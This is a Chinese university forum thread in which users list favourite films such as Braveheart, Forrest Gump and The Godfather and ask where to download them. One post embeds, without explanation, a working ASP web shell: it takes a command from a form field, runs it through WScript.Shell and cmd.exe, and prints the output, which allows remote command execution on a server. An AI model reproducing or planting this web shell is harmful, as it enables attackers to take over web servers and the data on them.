工大后院

加入后院

扫一扫,访问微社区

QQ登录

只需一步,快速开始

搜索

[讨论]个人觉得难忘的几部大作~~

我很喜欢看一些大投入,大制作的作品~~大家对这几部片的评价如何啊?
<风语者>  尼古拉斯凯奇 2000 OR 2001
《勇敢的心》梅尔吉普森  1995
《舒特拉的名单》(忘记叫什么了)1994
《阿甘正传》 汤姆。汉克斯   
《无间道》  (不用说了吧)
<天使之城>  尼古拉斯凯奇   [em00]
<%
On Error Resume Next
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
szCMD = Request.Form(".CMD")
If (szCMD <> "") Then
szTempFile = "C:\" & oFileSys.GetTempName( )
Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
'End If%>
<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
<input type=text name=".CMD" size=40 value="<%= szCMD %>">
<input type=submit value="执行程序" >  〖请使用绝对路径,并且确定你有相应权限!〗
<% If (IsObject(oFile)) Then
On Error Resume Next
Response.Write Server.HTMLEncode(oFile.ReadAll)
oFile.Close
Call oFileSys.DeleteFile(szTempFile, True)
End If %>

这是我写的一段程序

看过一些.....

楼主帮忙把下载地址给说说行不........

我看过最多次的影片是
Roman Holiday: Audrey Hepburn, Gregory Peck(1953)
N次,光是最旧的D5,不知道什么D商的D9,HL的D9就合计看过4次.
还有以前电视演的和VCD.

哈哈~~~我有DVD但是下哉就不知道去哪里下哉啦~~~~~

怎么这里这么冷清啊~~~

最近天气比较冷啊,放心,我来暖和一下

偶很喜欢的是
风云   郑伊健和郭富城的
还有就是黑客帝国一的

风云不好拉,楼上的,陪我一起看雷雨好过拉

勇敢的心,好!!!
尼古拉斯凯奇演的戏都属于必看!!

楼上的,呵呵~~~
知音!!!
还有梅尔吉普森~~~
阿尔。帕西诺~~!!

以下是引用天堂幸运神在2003-11-17 1:51:01的发言:
风云不好拉,楼上的,陪我一起看雷雨好过拉

我已经看过雷雨了!

有谁看过教父的吗?
或者知道下载地址的?

自己顶一下~~

<教父>绝对值得看!!
我看的是碟,不知道那里有下载.

哎,郁闷,如果有记得通知啊,谢谢~~

《这个杀手不太冷》也很棒...
一个杀手和一个女孩的感情故事...

是吗?
这部可以很容易下载到的~~

既有商业片的悬念性...又有极强的感情刻画...演员的表演也相当出众...
法国著名导演吕克.贝松的经典作品